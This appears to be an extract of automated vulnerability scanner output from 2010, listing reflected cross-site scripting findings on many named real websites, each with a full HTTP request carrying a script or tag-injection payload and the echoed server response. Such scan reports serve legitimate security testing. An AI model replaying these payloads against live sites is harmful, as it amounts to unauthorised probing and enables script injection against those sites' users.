Content-Language: en-US
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title> gTLD Program Global Consultation and Outreach Events</title>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 875f1"><a>44604211b0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
<a>44604211b0d HTTP/1.1">
GET /Policies875f1"><a>44604211b0d HTTP/1.1
Host: www.registry.in
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:08:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS10880b2ef3f6403b3d3155e84a6e14dd=q44oj0na5vkku33djrttclcas3; expires=Mon, 03-Jan-2011 05:41:32 GMT; path=/; domain=.registry.in
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:08:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 5125
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equi ...[SNIP]... <body id="page-Policies875f1"><a>44604211b0d" class="section-Policies875f1"> ...[SNIP]...
1.184. http://www.tcbreview.com/is-it-the-real-thing.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tcbreview.com
Path:
/is-it-the-real-thing.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b781"><script>alert(1)</script>1b4cbd1ce9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
<script>alert(1)</script>1b4cbd1ce9d=1 HTTP/1.1">
GET /is-it-the-real-thing.php?4b781"><script>alert(1)</script>1b4cbd1ce9d=1 HTTP/1.1
Host: www.tcbreview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 44178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 179a2"><script>alert(1)</script>f465589a1ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
<script>alert(1)</script>f465589a1ad/2009-10-05/swine-flu-swindle/ HTTP/1.1">
GET /blogs-and-stories179a2"><script>alert(1)</script>f465589a1ad/2009-10-05/swine-flu-swindle/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 11 Dec 2010 02:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62115
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories179a2"><script>alert(1)</script>f465589a1ad/2009-10-05/swine-flu-swindle/full/"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f9b"><script>alert(1)</script>5e83f8ac653 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
<script>alert(1)</script>5e83f8ac653/swine-flu-swindle/ HTTP/1.1">
GET /blogs-and-stories/2009-10-0566f9b"><script>alert(1)</script>5e83f8ac653/swine-flu-swindle/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 11 Dec 2010 02:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2009-10-0566f9b"><script>alert(1)</script>5e83f8ac653/swine-flu-swindle/full/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 16a82--><a>415270452a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /article.php16a82--><a>415270452a8/200913/3278/APWG-releases-Phishing-report-for-second-half-of-2008 HTTP/1.1
Host: www.thetechherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:06:38 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 11304
<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"--> <html xmlns="http://www.w3.org/1999/xhtml" xm ...[SNIP]... <!--article.php16a82--><a>415270452a8--> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fc6b5--><a>5a135f84d92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /article.phpfc6b5--><a>5a135f84d92/201002/5069/Baidu-defaced-by-ICA-after-DNS-hijacking HTTP/1.1
Host: www.thetechherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:06:38 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 11304
<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"--> <html xmlns="http://www.w3.org/1999/xhtml" xm ...[SNIP]... <!--article.phpfc6b5--><a>5a135f84d92--> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0de2"><a>fc229b7dbd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
<a>fc229b7dbd1/022708_MarkMonitor_Shares_Report_Results.cfm HTTP/1.1">
GET /marketwatchf0de2"><a>fc229b7dbd1/022708_MarkMonitor_Shares_Report_Results.cfm HTTP/1.1
Host: www.thewhir.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:01:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 32643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 881f4"><a>43fd5b886b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
<a>43fd5b886b0/081908_ICANN_to_Hold_Auctions_for_Disputes.cfm HTTP/1.1">
GET /marketwatch881f4"><a>43fd5b886b0/081908_ICANN_to_Hold_Auctions_for_Disputes.cfm HTTP/1.1
Host: www.thewhir.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:01:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 32643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7722d"><a>3fe5e8a82d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
<a>3fe5e8a82d3/102008_MarkMonitor_Advises_on_New_TLDs.cfm HTTP/1.1">
GET /marketwatch7722d"><a>3fe5e8a82d3/102008_MarkMonitor_Advises_on_New_TLDs.cfm HTTP/1.1
Host: www.thewhir.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:01:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 32643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ec5"><a>252879ec725 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
<a>252879ec725/040309_Q&A:_Te_Smith,_MarkMonitor HTTP/1.1">
GET /web-hosting-newsb7ec5"><a>252879ec725/040309_Q&A:_Te_Smith,_MarkMonitor HTTP/1.1
Host: www.thewhir.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:01:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 32648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 699e0"><a>fbd6b3f4020 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /web-hosting-news699e0"><a>fbd6b3f4020/092809_Phishing_at_a_Two_Year_High_MarkMonitor HTTP/1.1
Host: www.thewhir.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:01:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 32648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
1.194. http://www.thnic.net/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.thnic.net
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 44ae9'><script>alert(1)</script>9db8ec12eb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?44ae9'><script>alert(1)</script>9db8ec12eb3=1 HTTP/1.1
Host: www.thnic.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 01:59:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=49baaa3aea84df7129961856f61b65ce; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48368
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>THNIC : Begin Your Success</title> <me ...[SNIP]... <a href='/index.php?44ae9'><script>alert(1)</script>9db8ec12eb3=1&new_language=1'> ...[SNIP]...
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a2c25'><script>alert(1)</script>e81400e2623 was submitted in the page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?page=policya2c25'><script>alert(1)</script>e81400e2623 HTTP/1.1
Host: www.thnic.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 01:59:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=6017dfd5dfbed67900ed35f958a714ae; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48363
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>THNIC : Begin Your Success</title> <me ...[SNIP]... <a href='/index.php?page=policya2c25'><script>alert(1)</script>e81400e2623&new_language=1'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f5bb<script>alert(1)</script>3a9fb58ff8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq.htm1f5bb<script>alert(1)</script>3a9fb58ff8f HTTP/1.1
Host: www.tonic.to
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 01:54:20 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 69
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 237be<script>alert(1)</script>47ebb11e311 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq.htm237be<script>alert(1)</script>47ebb11e311 HTTP/1.1
Host: www.vunic.vu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:05 GMT
Server: Apache/2.0.49 (Unix)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 69
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e29ee%20a%3db3a4ec9bbad8 was submitted in the REST URL parameter 1. This input was echoed as e29ee a=b3a4ec9bbad8 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /etailusaeaste29ee%20a%3db3a4ec9bbad8/ HTTP/1.1
Host: www.wbresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 02:06:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.wbresearch.com&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=fkbwoe45wgiga045hcbxa2vx; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36866
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f8351%20a%3db39f7a5ea6ae was submitted in the REST URL parameter 1. This input was echoed as f8351 a=b39f7a5ea6ae in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /luxuryinteractivef8351%20a%3db39f7a5ea6ae/agenda_main_full2.asp HTTP/1.1
Host: www.wbresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 02:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.wbresearch.com&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=3wymaje20jlcuf2yy5zas1mn; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36892
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f2ef6%20a%3db5edbd6eed74 was submitted in the REST URL parameter 2. This input was echoed as f2ef6 a=b5edbd6eed74 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /luxuryinteractive/f2ef6%20a%3db5edbd6eed74 HTTP/1.1
Host: www.wbresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 02:06:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.wbresearch.com&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=3mnxfl3ufxhafyzlzdbsh255; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36872
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b993"><script>alert(1)</script>51942b18704 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews5b993"><script>alert(1)</script>51942b18704/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:06:16 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=fhq7e24q8im9dcvke1ea01ios2; expires=Mon, 03 Jan 2011 05:39:36 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14308
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afa17"><script>alert(1)</script>a889397c2d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008afa17"><script>alert(1)</script>a889397c2d7/06/19/domain-kiting-ppc-abuse-dropping-in-tandem HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:16 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=fgj559actlq22gflvbf493gts0; expires=Mon, 03 Jan 2011 05:39:36 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38517
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc55f"><script>alert(1)</script>e2a2c44ff5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008/06dc55f"><script>alert(1)</script>e2a2c44ff5/19/domain-kiting-ppc-abuse-dropping-in-tandem HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:18 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=ltuinoebsggvnq1mbnm6p9qom2; expires=Mon, 03 Jan 2011 05:39:38 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38505
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a15d"><script>alert(1)</script>6410cb113da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008/06/196a15d"><script>alert(1)</script>6410cb113da/domain-kiting-ppc-abuse-dropping-in-tandem HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:20 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=mhjr1p3ld7qgv5213b1fso0be0; expires=Mon, 03 Jan 2011 05:39:40 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38543
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613ef"><script>alert(1)</script>12fa6739341 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem613ef"><script>alert(1)</script>12fa6739341 HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:21 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=1iv153hcejag2i76bfmgpoo696; expires=Mon, 03 Jan 2011 05:39:41 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38543
